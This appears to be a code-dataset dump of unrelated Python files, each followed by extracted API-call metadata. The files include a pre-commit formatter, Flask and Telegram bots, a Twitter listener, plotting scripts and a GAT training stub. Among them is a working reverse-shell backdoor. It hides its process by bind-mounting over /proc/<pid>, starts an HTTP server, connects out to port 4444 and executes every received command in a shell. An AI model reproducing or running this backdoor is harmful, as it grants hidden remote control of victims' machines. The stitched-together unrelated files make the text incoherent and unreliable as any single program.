# Requires autopep8 to be installed.
# Script for cleaning up most PEP8 related errors checked by the pre-commit hook.
#
import os
import subprocess
import sys
# don't fill in both of these
# good codes
select_codes = ["E111", "E101",
"E201", "E202", "E203", "E221", "E222", "E223", "E224", "E225",
"E226", "E227", "E228", "E231", "E241", "E242", "E251",
"E303", "E304",
"E502",
"E711", "E712", "E713", "E714", "E721",
"E741", "E742", "E743",
"W191",
"W291", "W293", "W292",
"W391",
"W602", "W603",
]
ignore_codes = []
# Add things like "--max-line-length=120" below
overrides = ["--max-line-length=120",
]
def system(*args, **kwargs):
kwargs.setdefault('stdout', subprocess.PIPE)
proc = subprocess.Popen(args, **kwargs)
out, err = proc.communicate()
return out
def main():
cwd = os.getcwd()
if '.git' not in os.listdir(cwd):
print('Must be run from the root of the repository.')
sys.exit(1)
files = system('git', 'diff', '--cached', '--name-only').decode("utf-8")
files = [file.strip() for file in files.split('\n') if file.strip().endswith('.py')]
if not files:
sys.exit(0)
args = ['autopep8', '--in-place']
if select_codes and ignore_codes:
print('Error: select and ignore codes are mutually exclusive')
sys.exit(1)
elif select_codes:
args.extend(('--select', ','.join(select_codes)))
elif ignore_codes:
args.extend(('--ignore', ','.join(ignore_codes)))
args.extend(overrides)
args.extend(files)
output = system(*args, cwd=cwd)
if output:
print(output.decode("utf-8"),)
sys.exit(1)
sys.exit(0)
if __name__ == '__main__':
main()
| [
"subprocess.Popen",
"os.listdir",
"sys.exit",
"os.getcwd"
] | [((910, 942), 'subprocess.Popen', 'subprocess.Popen', (['args'], {}), '(args, **kwargs)\n', (926, 942), False, 'import subprocess\n'), ((1015, 1026), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1024, 1026), False, 'import os\n'), ((1846, 1857), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1854, 1857), False, 'import sys\n'), ((1048, 1063), 'os.listdir', 'os.listdir', (['cwd'], {}), '(cwd)\n', (1058, 1063), False, 'import os\n'), ((1135, 1146), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1143, 1146), False, 'import sys\n'), ((1340, 1351), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1348, 1351), False, 'import sys\n'), ((1508, 1519), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1516, 1519), False, 'import sys\n'), ((1830, 1841), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1838, 1841), False, 'import sys\n')] |
import logging
NULL_LOGGER = logging.getLogger('null')
NULL_LOGGER.handlers = [logging.NullHandler()]
NULL_LOGGER.propagate = False
| [
"logging.getLogger",
"logging.NullHandler"
] | [((30, 55), 'logging.getLogger', 'logging.getLogger', (['"""null"""'], {}), "('null')\n", (47, 55), False, 'import logging\n'), ((80, 101), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (99, 101), False, 'import logging\n')] |
import argparse
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Start Telegram bot.')
parser.add_argument('-f', dest='foreground', action='store_true',
help='run process in foreground')
parser.add_argument('-s', dest='settings', action='store',
help='settings file', default='/settings.json')
parser.add_argument('-t', dest='temp', action='store',
help='temp directory', default='/tg_tmp')
args = vars(parser.parse_args())
os.environ['TG_BOT_SETTINGS'] = os.path.realpath(args['settings'])
os.environ['TG_BOT_TEMP'] = os.path.realpath(args['temp'])
from bot.run import run_server
run_server(args['foreground'])
| [
"os.path.realpath",
"bot.run.run_server",
"argparse.ArgumentParser"
] | [((68, 126), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Start Telegram bot."""'}), "(description='Start Telegram bot.')\n", (91, 126), False, 'import argparse\n'), ((590, 624), 'os.path.realpath', 'os.path.realpath', (["args['settings']"], {}), "(args['settings'])\n", (606, 624), False, 'import os\n'), ((657, 687), 'os.path.realpath', 'os.path.realpath', (["args['temp']"], {}), "(args['temp'])\n", (673, 687), False, 'import os\n'), ((728, 758), 'bot.run.run_server', 'run_server', (["args['foreground']"], {}), "(args['foreground'])\n", (738, 758), False, 'from bot.run import run_server\n')] |
#!/usr/bin/python
# encoding: utf-8
import os
import json
import time
from time import sleep
import requests
import re
from werkzeug import secure_filename
from flask import (Flask, request, render_template,
session, redirect, url_for, escape,
send_from_directory, Blueprint, abort)
delete_okta = Blueprint('okta_delete', __name__)
@delete_okta.route('/okta_delete', methods=['GET','POST'])
def okta_delete():
exists = os.path.isfile('/usr/local/jawa/webapp/server.json')
if exists == False:
return render_template('setup.html',
setup="setup",
username=str(escape(session['username'])))
if 'username' in session:
text = open('/usr/local/jawa/okta_json.json', 'r+')
content = text.read()
webhook_data = json.loads(content)
i = 0
names = []
for item in webhook_data:
names.append(str(webhook_data[i]['name']))
i += 1
content = names
if request.method == 'POST':
if request.form.get('webhookname') != '':
webhookname = request.form.get('webhookname')
ts = time.time()
hooks_file = '/etc/webhook.conf'
data = json.load(open(hooks_file))
for d in data :
if d['id'] == webhookname:
scriptPath=(d['execute-command'])
newScriptPath = scriptPath + '.old'
os.rename(scriptPath, newScriptPath)
data[:] = [d for d in data if d.get('id') != webhookname ]
with open(hooks_file, 'w') as outfile:
json.dump(data, outfile)
hooks_file = '/usr/local/jawa/okta_json.json'
data = json.load(open(hooks_file))
for d in data :
if d['name'] == webhookname:
response = requests.post(d['okta_url'] + '/api/v1/eventHooks/{}/lifecycle/deactivate'.format(d['okta_id']),
headers={"Authorization": "SSWS {}".format(d['okta_token'])})
response = requests.delete(d['okta_url'] + '/api/v1/eventHooks/{}'.format(d['okta_id']),
headers={"Authorization": "SSWS {}".format(d['okta_token'])})
data[:] = [d for d in data if d.get('name') != webhookname ]
with open(hooks_file, 'w') as outfile:
json.dump(data, outfile)
return redirect(url_for('success'))
else:
return render_template('okta_delete.html',
text=content, delete="delete",
username=str(escape(session['username'])))
else:
return render_template('home.html',
login="false")
| [
"flask.render_template",
"json.loads",
"flask.escape",
"os.rename",
"flask.request.form.get",
"os.path.isfile",
"flask.url_for",
"flask.Blueprint",
"time.time",
"json.dump"
] | [((302, 336), 'flask.Blueprint', 'Blueprint', (['"""okta_delete"""', '__name__'], {}), "('okta_delete', __name__)\n", (311, 336), False, 'from flask import Flask, request, render_template, session, redirect, url_for, escape, send_from_directory, Blueprint, abort\n'), ((426, 478), 'os.path.isfile', 'os.path.isfile', (['"""/usr/local/jawa/webapp/server.json"""'], {}), "('/usr/local/jawa/webapp/server.json')\n", (440, 478), False, 'import os\n'), ((729, 748), 'json.loads', 'json.loads', (['content'], {}), '(content)\n', (739, 748), False, 'import json\n'), ((2247, 2290), 'flask.render_template', 'render_template', (['"""home.html"""'], {'login': '"""false"""'}), "('home.html', login='false')\n", (2262, 2290), False, 'from flask import Flask, request, render_template, session, redirect, url_for, escape, send_from_directory, Blueprint, abort\n'), ((911, 942), 'flask.request.form.get', 'request.form.get', (['"""webhookname"""'], {}), "('webhookname')\n", (927, 942), False, 'from flask import Flask, request, render_template, session, redirect, url_for, escape, send_from_directory, Blueprint, abort\n'), ((969, 1000), 'flask.request.form.get', 'request.form.get', (['"""webhookname"""'], {}), "('webhookname')\n", (985, 1000), False, 'from flask import Flask, request, render_template, session, redirect, url_for, escape, send_from_directory, Blueprint, abort\n'), ((1010, 1021), 'time.time', 'time.time', ([], {}), '()\n', (1019, 1021), False, 'import time\n'), ((2072, 2090), 'flask.url_for', 'url_for', (['"""success"""'], {}), "('success')\n", (2079, 2090), False, 'from flask import Flask, request, render_template, session, redirect, url_for, escape, send_from_directory, Blueprint, abort\n'), ((575, 602), 'flask.escape', 'escape', (["session['username']"], {}), "(session['username'])\n", (581, 602), False, 'from flask import Flask, request, render_template, session, redirect, url_for, escape, send_from_directory, Blueprint, abort\n'), ((1392, 1416), 'json.dump', 'json.dump', (['data', 'outfile'], {}), '(data, outfile)\n', (1401, 1416), False, 'import json\n'), ((2026, 2050), 'json.dump', 'json.dump', (['data', 'outfile'], {}), '(data, outfile)\n', (2035, 2050), False, 'import json\n'), ((1242, 1278), 'os.rename', 'os.rename', (['scriptPath', 'newScriptPath'], {}), '(scriptPath, newScriptPath)\n', (1251, 1278), False, 'import os\n'), ((2201, 2228), 'flask.escape', 'escape', (["session['username']"], {}), "(session['username'])\n", (2207, 2228), False, 'from flask import Flask, request, render_template, session, redirect, url_for, escape, send_from_directory, Blueprint, abort\n')] |
from rest_framework import viewsets
from accounts.models import SystemUser
from accounts.serializers.system_user import SystemUserSerializer
class AccountViewSet(viewsets.ModelViewSet):
"""
A simple ViewSet for viewing and editing accounts.
"""
queryset = SystemUser.objects.all()
serializer_class = SystemUserSerializer
permission_classes = []
| [
"accounts.models.SystemUser.objects.all"
] | [((275, 299), 'accounts.models.SystemUser.objects.all', 'SystemUser.objects.all', ([], {}), '()\n', (297, 299), False, 'from accounts.models import SystemUser\n')] |
import tweepy
from application.twitter.listener.streaming import TwitterStreamingListener, TwitterUserStreamingListener
from application.twitter.interface import TwitterInterface
class TwitterListener(TwitterInterface):
def __init__(self, keywords, user, *args, **kwargs):
"""
Twitter Listener constructor. This class is used as middleware for the Twitter Listener
:param keywords: List of keywords
:param user: User to listen
"""
super(TwitterListener, self).__init__(*args, **kwargs)
self.user = None
self.keywords = None
if len(keywords[0]) > 0:
self.keywords = keywords
self.stream = tweepy.streaming.Stream(self.auth, TwitterStreamingListener(keywords))
if len(user) > 0:
try:
self.user = self.api.get_user(user)
self.user_stream = tweepy.streaming.Stream(self.auth, TwitterUserStreamingListener(user))
except Exception:
raise Exception("Error during the listener creation, does the user exists?")
def start(self, process_manager):
"""
Create new Twitter Listener Process
:param process_manager: Process Manager Instance
:return:
"""
if self.keywords:
try:
process_manager.create_process(target=lambda: self.stream.filter(track=self.keywords),
name='Twitter Keywords Listener: <%s>' % '-'.join(self.keywords),
ptype='twitter_listener')
except Exception:
raise Exception("Error creating new Keywords listener")
if self.user:
try:
process_manager.create_process(target=lambda: self.user_stream.filter(follow=[self.user.id_str]),
name='Twitter User Listener: <%s>' % self.user.screen_name,
ptype='twitter_listener')
except Exception:
raise Exception("Error creating new User tweet listener ")
def __str__(self):
"""
String representation
:return:
"""
return 'Twitter Listener'
| [
"application.twitter.listener.streaming.TwitterStreamingListener",
"application.twitter.listener.streaming.TwitterUserStreamingListener"
] | [((727, 761), 'application.twitter.listener.streaming.TwitterStreamingListener', 'TwitterStreamingListener', (['keywords'], {}), '(keywords)\n', (751, 761), False, 'from application.twitter.listener.streaming import TwitterStreamingListener, TwitterUserStreamingListener\n'), ((929, 963), 'application.twitter.listener.streaming.TwitterUserStreamingListener', 'TwitterUserStreamingListener', (['user'], {}), '(user)\n', (957, 963), False, 'from application.twitter.listener.streaming import TwitterStreamingListener, TwitterUserStreamingListener\n')] |
#!/bin/python3
import time,socket,subprocess,os,string
import random as r
# ranadom process name
ch = string.ascii_lowercase + string.digits
token = "".join(r.choice(ch) for i in range(6))
#pid and hidden process
pid = os.getpid()
os.system("mkdir /tmp/{1} && mount -o bind /tmp/{1} /proc/{0}".format(pid,token))
# target hostname
hostname = "\nName Of Target Host: \t" + str(socket.gethostname()) + "\n"
# reverse shell ip and port
HOST = '127.0.0.1'
PORT = 4444
command = os.system('python -m http.server 8000 &')
def Makeconnection(H,P,hostname):
try:
time.sleep(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((H,P))
s.sendall(b'\n [+][+] CONNECTION IS ESTABLISHED [+][+] \n')
s.sendto(hostname.encode(),(H,P))
while 1:
s.sendall(b'SHELL@HOST >>')
data =s.recv(1024)
proc = subprocess.Popen(data,shell=True,stdin=subprocess.PIPE,stderr=subprocess.PIPE, stdout=subprocess.PIPE )
stdout_value = proc.stdout.read() + proc.stderr.read()
s.send(stdout_value)
except socket.error:
s.close()
while 1:
Makeconnection(HOST,PORT,hostname)
| [
"random.choice",
"socket.socket",
"subprocess.Popen",
"time.sleep",
"os.getpid",
"os.system",
"socket.gethostname"
] | [((228, 239), 'os.getpid', 'os.getpid', ([], {}), '()\n', (237, 239), False, 'import time, socket, subprocess, os, string\n'), ((491, 532), 'os.system', 'os.system', (['"""python -m http.server 8000 &"""'], {}), "('python -m http.server 8000 &')\n", (500, 532), False, 'import time, socket, subprocess, os, string\n'), ((161, 173), 'random.choice', 'r.choice', (['ch'], {}), '(ch)\n', (169, 173), True, 'import random as r\n'), ((584, 597), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (594, 597), False, 'import time, socket, subprocess, os, string\n'), ((610, 659), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (623, 659), False, 'import time, socket, subprocess, os, string\n'), ((389, 409), 'socket.gethostname', 'socket.gethostname', ([], {}), '()\n', (407, 409), False, 'import time, socket, subprocess, os, string\n'), ((902, 1012), 'subprocess.Popen', 'subprocess.Popen', (['data'], {'shell': '(True)', 'stdin': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'stdout': 'subprocess.PIPE'}), '(data, shell=True, stdin=subprocess.PIPE, stderr=subprocess\n .PIPE, stdout=subprocess.PIPE)\n', (918, 1012), False, 'import time, socket, subprocess, os, string\n')] |
from object import *
import matplotlib
import matplotlib.pyplot as plt
class Cat(Object):
def update(self):
self.x = self.x + np.array([self.x[2], self.x[3], 100*np.random.randn(), 100*np.random.randn()])*self.step
self.t = self.t + self.step
self.check_wall()
self.check_obstacles()
self.state2pixel()
def run(self, interval):
self.trajectory = []
self.trajectory.append([self.x[0], self.x[1], self.t])
tf = self.t + interval
while self.t < tf:
self.update()
self.trajectory.append([self.x[0], self.x[1], self.t])
self.trajectory = np.array(self.trajectory)
def main():
pygame.init()
pygame.display.set_mode()
cat1 = Cat(x0=[0, 0, 0, 0], obstacles=[(1, 1), (1, 3), (3, 1), (3, 3)])
cat1.run(100)
# cat1.run(1)
plt.plot(cat1.trajectory[:, 2], cat1.trajectory[:, 0], 'b', label='x(t)')
plt.plot(cat1.trajectory[:, 2], cat1.trajectory[:, 1], 'b', label='x(t)')
plt.legend(loc='best')
plt.xlabel('t')
plt.grid()
plt.show()
if __name__ == "__main__":
main()
| [
"matplotlib.pyplot.grid",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
] | [((854, 927), 'matplotlib.pyplot.plot', 'plt.plot', (['cat1.trajectory[:, 2]', 'cat1.trajectory[:, 0]', '"""b"""'], {'label': '"""x(t)"""'}), "(cat1.trajectory[:, 2], cat1.trajectory[:, 0], 'b', label='x(t)')\n", (862, 927), True, 'import matplotlib.pyplot as plt\n'), ((932, 1005), 'matplotlib.pyplot.plot', 'plt.plot', (['cat1.trajectory[:, 2]', 'cat1.trajectory[:, 1]', '"""b"""'], {'label': '"""x(t)"""'}), "(cat1.trajectory[:, 2], cat1.trajectory[:, 1], 'b', label='x(t)')\n", (940, 1005), True, 'import matplotlib.pyplot as plt\n'), ((1010, 1032), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (1020, 1032), True, 'import matplotlib.pyplot as plt\n'), ((1037, 1052), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""t"""'], {}), "('t')\n", (1047, 1052), True, 'import matplotlib.pyplot as plt\n'), ((1057, 1067), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (1065, 1067), True, 'import matplotlib.pyplot as plt\n'), ((1072, 1082), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1080, 1082), True, 'import matplotlib.pyplot as plt\n')] |
from __future__ import print_function
from __future__ import division
import pandas as pd
# Import scipy io to write/read mat file
import scipy.io as io
import os
# Plotting
import matplotlib.pylab as plt
plt.rc('axes', labelsize=20) # fontsize of the x and y labels
plt.rc('xtick', labelsize=15) # fontsize of the tick labels
plt.rc('ytick', labelsize=15) # fontsize of the tick labels
plt.rc('legend', fontsize=15) # legend fontsize
plt.rc('text', usetex=True) # use latex
plt.rc('font', family='serif')
# Import data from mat files to pandas dataframe
cvxgen_results = io.loadmat(os.path.join('cvxgen',
'cvxgen_stats.mat'))['cvxgen_stats']
cvxgen_stats = pd.DataFrame(cvxgen_results, columns=['n', 'cvxgen_runtime'])
cvxgen_stats['n'] = cvxgen_stats['n'].astype(int)
fiordos_results = io.loadmat(os.path.join('fiordos',
'fiordos_stats.mat'))['fiordos_stats']
fiordos_stats = pd.DataFrame(fiordos_results, columns=['n', 'fiordos_runtime'])
fiordos_stats['n'] = fiordos_stats['n'].astype(int)
# Import data from CSV files
osqp_stats = pd.read_csv('osqp_stats.csv')
gurobi_stats = pd.read_csv('gurobi_stats.csv')
qpoases_stats = pd.read_csv('qpoases_stats.csv')
# Get mean number of iterations and runtime for each number of parameters
osqp_mean = osqp_stats.groupby('n').mean()
gurobi_mean = gurobi_stats.groupby('n').mean()
qpoases_mean = qpoases_stats.groupby('n').mean()
cvxgen_mean = cvxgen_stats.groupby('n').mean()
fiordos_mean = fiordos_stats.groupby('n').mean()
# Save mean stats in a CSV file
osqp_mean.columns = ['osqp_iter', 'osqp_runtime']
gurobi_mean.columns = ['gurobi_iter', 'gurobi_runtime']
qpoases_mean.columns = ['qpoases_iter', 'qpoases_runtime']
mean_stats = pd.concat([osqp_mean, gurobi_mean, qpoases_mean,
cvxgen_mean, fiordos_mean], axis=1)
mean_stats.to_csv('portfolio_mean_stats.csv')
# Plot mean runtime
plt.figure()
ax = plt.gca()
plt.semilogy(mean_stats.index.values,
mean_stats['osqp_runtime'].get_values(),
color='C0', label='OSQP')
plt.semilogy(mean_stats.index.values,
mean_stats['qpoases_runtime'].get_values(),
color='C2', label='qpOASES')
plt.semilogy(mean_stats.index.values,
mean_stats['cvxgen_runtime'].get_values(),
color='C3', label='CVXGEN')
plt.semilogy(mean_stats.index.values,
mean_stats['fiordos_runtime'].get_values(),
color='C4', label='FiOrdOs')
plt.semilogy(mean_stats.index.values,
mean_stats['gurobi_runtime'].get_values(),
color='C5', label='GUROBI')
plt.legend()
plt.grid()
ax.set_xlabel(r'Number of assets $n$')
ax.set_ylabel(r'Time [s]')
plt.tight_layout()
plt.show(block=False)
plt.savefig('results.pdf')
| [
"matplotlib.pylab.gca",
"matplotlib.pylab.savefig",
"pandas.read_csv",
"matplotlib.pylab.figure",
"matplotlib.pylab.grid",
"matplotlib.pylab.legend",
"matplotlib.pylab.tight_layout",
"os.path.join",
"matplotlib.pylab.show",
"pandas.DataFrame",
"pandas.concat",
"matplotlib.pylab.rc"
] | [((207, 235), 'matplotlib.pylab.rc', 'plt.rc', (['"""axes"""'], {'labelsize': '(20)'}), "('axes', labelsize=20)\n", (213, 235), True, 'import matplotlib.pylab as plt\n'), ((272, 301), 'matplotlib.pylab.rc', 'plt.rc', (['"""xtick"""'], {'labelsize': '(15)'}), "('xtick', labelsize=15)\n", (278, 301), True, 'import matplotlib.pylab as plt\n'), ((334, 363), 'matplotlib.pylab.rc', 'plt.rc', (['"""ytick"""'], {'labelsize': '(15)'}), "('ytick', labelsize=15)\n", (340, 363), True, 'import matplotlib.pylab as plt\n'), ((396, 425), 'matplotlib.pylab.rc', 'plt.rc', (['"""legend"""'], {'fontsize': '(15)'}), "('legend', fontsize=15)\n", (402, 425), True, 'import matplotlib.pylab as plt\n'), ((446, 473), 'matplotlib.pylab.rc', 'plt.rc', (['"""text"""'], {'usetex': '(True)'}), "('text', usetex=True)\n", (452, 473), True, 'import matplotlib.pylab as plt\n'), ((490, 520), 'matplotlib.pylab.rc', 'plt.rc', (['"""font"""'], {'family': '"""serif"""'}), "('font', family='serif')\n", (496, 520), True, 'import matplotlib.pylab as plt\n'), ((715, 776), 'pandas.DataFrame', 'pd.DataFrame', (['cvxgen_results'], {'columns': "['n', 'cvxgen_runtime']"}), "(cvxgen_results, columns=['n', 'cvxgen_runtime'])\n", (727, 776), True, 'import pandas as pd\n'), ((965, 1028), 'pandas.DataFrame', 'pd.DataFrame', (['fiordos_results'], {'columns': "['n', 'fiordos_runtime']"}), "(fiordos_results, columns=['n', 'fiordos_runtime'])\n", (977, 1028), True, 'import pandas as pd\n'), ((1124, 1153), 'pandas.read_csv', 'pd.read_csv', (['"""osqp_stats.csv"""'], {}), "('osqp_stats.csv')\n", (1135, 1153), True, 'import pandas as pd\n'), ((1169, 1200), 'pandas.read_csv', 'pd.read_csv', (['"""gurobi_stats.csv"""'], {}), "('gurobi_stats.csv')\n", (1180, 1200), True, 'import pandas as pd\n'), ((1217, 1249), 'pandas.read_csv', 'pd.read_csv', (['"""qpoases_stats.csv"""'], {}), "('qpoases_stats.csv')\n", (1228, 1249), True, 'import pandas as pd\n'), ((1771, 1859), 'pandas.concat', 'pd.concat', (['[osqp_mean, gurobi_mean, qpoases_mean, cvxgen_mean, fiordos_mean]'], {'axis': '(1)'}), '([osqp_mean, gurobi_mean, qpoases_mean, cvxgen_mean, fiordos_mean],\n axis=1)\n', (1780, 1859), True, 'import pandas as pd\n'), ((1947, 1959), 'matplotlib.pylab.figure', 'plt.figure', ([], {}), '()\n', (1957, 1959), True, 'import matplotlib.pylab as plt\n'), ((1965, 1974), 'matplotlib.pylab.gca', 'plt.gca', ([], {}), '()\n', (1972, 1974), True, 'import matplotlib.pylab as plt\n'), ((2650, 2662), 'matplotlib.pylab.legend', 'plt.legend', ([], {}), '()\n', (2660, 2662), True, 'import matplotlib.pylab as plt\n'), ((2663, 2673), 'matplotlib.pylab.grid', 'plt.grid', ([], {}), '()\n', (2671, 2673), True, 'import matplotlib.pylab as plt\n'), ((2740, 2758), 'matplotlib.pylab.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (2756, 2758), True, 'import matplotlib.pylab as plt\n'), ((2759, 2780), 'matplotlib.pylab.show', 'plt.show', ([], {'block': '(False)'}), '(block=False)\n', (2767, 2780), True, 'import matplotlib.pylab as plt\n'), ((2781, 2807), 'matplotlib.pylab.savefig', 'plt.savefig', (['"""results.pdf"""'], {}), "('results.pdf')\n", (2792, 2807), True, 'import matplotlib.pylab as plt\n'), ((599, 641), 'os.path.join', 'os.path.join', (['"""cvxgen"""', '"""cvxgen_stats.mat"""'], {}), "('cvxgen', 'cvxgen_stats.mat')\n", (611, 641), False, 'import os\n'), ((857, 901), 'os.path.join', 'os.path.join', (['"""fiordos"""', '"""fiordos_stats.mat"""'], {}), "('fiordos', 'fiordos_stats.mat')\n", (869, 901), False, 'import os\n')] |
from core.config import app_config
import json
import datetime
import logging
import os
from flask import Flask, render_template, Response, request, send_from_directory
from core import compat, app, utils
from core.ctrl import api, auth
compat.check_version()
webapp = Flask(__name__)
app.mode = 'http'
@webapp.route('/')
def index():
if request.headers.get('X-Forwarded-For') != None:
app.config['client_ip'] = request.headers.get('X-Forwarded-For')
else:
app.config['client_ip'] = request.remote_addr
if request.headers.get('X-Real-Ip') != None:
app.config['client_ip'] = request.headers.get('X-Real-Ip')
return render_template('index.html', config=app.config)
@webapp.route('/api/')
@webapp.route('/api/<path:api_method>', methods=['POST', 'GET'])
def respond(api_method=None):
if request.headers.get('X-Forwarded-For') != None:
app.config['client_ip'] = request.headers.get('X-Forwarded-For')
else:
app.config['client_ip'] = request.remote_addr
if request.headers.get('X-Real-Ip') != None:
app.config['client_ip'] = request.headers.get('X-Real-Ip')
api_method = str(api_method).replace('/', '')
reason = f"API route {api_method} is not supported"
module_status = False
result = None
request_method = "Unknown"
if api_method != None and api_method in dir(api):
reason = f"API route: {api_method}"
data_pass = {}
if request.method == 'POST':
request_method = 'POST'
if request.headers.get('Content-type') != None and request.headers.get('Content-type').startswith('application/json'):
request_method = 'POST-JSON'
data_pass = request.get_json()
else:
data_pass = request.form
else:
request_method = 'GET'
data_pass = request.args
data_pass = dict(data_pass)
logged = auth.authorization_process(api_method)
result = logged
app.config['user'] = result
if logged['status'] == True:
# Start api request passing
module_status = True
if api_method != 'login':
result = getattr(api, api_method)(data_pass)
res = json.dumps({
'api': f"{app.config['full_name']} REST api 1.0",
'module_status': module_status,
'request_method': request_method,
'reason': reason,
'result': result
})
return Response(res, mimetype='application/json')
@webapp.route('/resource/')
@webapp.route('/resource/<path:resource_name>')
def get_resource(resource_name=None):
resource_name = str(resource_name).replace('/', '')
resource_dir = app.config['filesystem']['resources'].replace('/', os.path.sep)
if resource_name != None:
try:
return send_from_directory(directory=resource_dir, path=resource_name)
except Exception as error:
return Response(f"Resource {resource_name} not found.", mimetype='text/plain')
return Response(f"Resource not defined.", mimetype='text/plain')
if __name__ == '__main__':
today = datetime.date.today()
logging.basicConfig(
filename=f"storage/logs/ctrl-server-{today.strftime('%Y-%m')}.log", level=logging.INFO, format='%(asctime)s %(message)s')
# Open, any host allowed
webapp.run(debug=True, host='0.0.0.0', port='5007')
# Secure, only localhost allowed
# webapp.run(debug=True, host='127.0.0.1', port='5007')
| [
"flask.render_template",
"core.compat.check_version",
"flask.send_from_directory",
"flask.Flask",
"core.ctrl.auth.authorization_process",
"json.dumps",
"flask.request.get_json",
"flask.Response",
"datetime.date.today",
"flask.request.headers.get"
] | [((238, 260), 'core.compat.check_version', 'compat.check_version', ([], {}), '()\n', (258, 260), False, 'from core import compat, app, utils\n'), ((270, 285), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (275, 285), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((659, 707), 'flask.render_template', 'render_template', (['"""index.html"""'], {'config': 'app.config'}), "('index.html', config=app.config)\n", (674, 707), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((2261, 2433), 'json.dumps', 'json.dumps', (['{\'api\': f"{app.config[\'full_name\']} REST api 1.0", \'module_status\':\n module_status, \'request_method\': request_method, \'reason\': reason,\n \'result\': result}'], {}), '({\'api\': f"{app.config[\'full_name\']} REST api 1.0",\n \'module_status\': module_status, \'request_method\': request_method,\n \'reason\': reason, \'result\': result})\n', (2271, 2433), False, 'import json\n'), ((2484, 2526), 'flask.Response', 'Response', (['res'], {'mimetype': '"""application/json"""'}), "(res, mimetype='application/json')\n", (2492, 2526), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((3049, 3106), 'flask.Response', 'Response', (['f"""Resource not defined."""'], {'mimetype': '"""text/plain"""'}), "(f'Resource not defined.', mimetype='text/plain')\n", (3057, 3106), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((3148, 3169), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (3167, 3169), False, 'import datetime\n'), ((345, 383), 'flask.request.headers.get', 'request.headers.get', (['"""X-Forwarded-For"""'], {}), "('X-Forwarded-For')\n", (364, 383), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((427, 465), 'flask.request.headers.get', 'request.headers.get', (['"""X-Forwarded-For"""'], {}), "('X-Forwarded-For')\n", (446, 465), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((538, 570), 'flask.request.headers.get', 'request.headers.get', (['"""X-Real-Ip"""'], {}), "('X-Real-Ip')\n", (557, 570), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((614, 646), 'flask.request.headers.get', 'request.headers.get', (['"""X-Real-Ip"""'], {}), "('X-Real-Ip')\n", (633, 646), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((835, 873), 'flask.request.headers.get', 'request.headers.get', (['"""X-Forwarded-For"""'], {}), "('X-Forwarded-For')\n", (854, 873), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((917, 955), 'flask.request.headers.get', 'request.headers.get', (['"""X-Forwarded-For"""'], {}), "('X-Forwarded-For')\n", (936, 955), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((1028, 1060), 'flask.request.headers.get', 'request.headers.get', (['"""X-Real-Ip"""'], {}), "('X-Real-Ip')\n", (1047, 1060), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((1104, 1136), 'flask.request.headers.get', 'request.headers.get', (['"""X-Real-Ip"""'], {}), "('X-Real-Ip')\n", (1123, 1136), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((1940, 1978), 'core.ctrl.auth.authorization_process', 'auth.authorization_process', (['api_method'], {}), '(api_method)\n', (1966, 1978), False, 'from core.ctrl import api, auth\n'), ((2846, 2909), 'flask.send_from_directory', 'send_from_directory', ([], {'directory': 'resource_dir', 'path': 'resource_name'}), '(directory=resource_dir, path=resource_name)\n', (2865, 2909), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((1721, 1739), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (1737, 1739), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((2965, 3036), 'flask.Response', 'Response', (['f"""Resource {resource_name} not found."""'], {'mimetype': '"""text/plain"""'}), "(f'Resource {resource_name} not found.', mimetype='text/plain')\n", (2973, 3036), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((1532, 1567), 'flask.request.headers.get', 'request.headers.get', (['"""Content-type"""'], {}), "('Content-type')\n", (1551, 1567), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((1580, 1615), 'flask.request.headers.get', 'request.headers.get', (['"""Content-type"""'], {}), "('Content-type')\n", (1599, 1615), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n')] |
from __future__ import division
from __future__ import print_function
import os
import glob
import time
import random
import argparse
import numpy as np
import torch
import torchvision.models as models
import torch.autograd.profiler as profiler
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
from utils import load_data, accuracy
from models import GAT, SpGAT
# Training settings
parser = argparse.ArgumentParser()
parser.add_argument('--no-cuda', action='store_true', default=False, help='Disables CUDA training.')
parser.add_argument('--fastmode', action='store_true', default=False, help='Validate during training pass.')
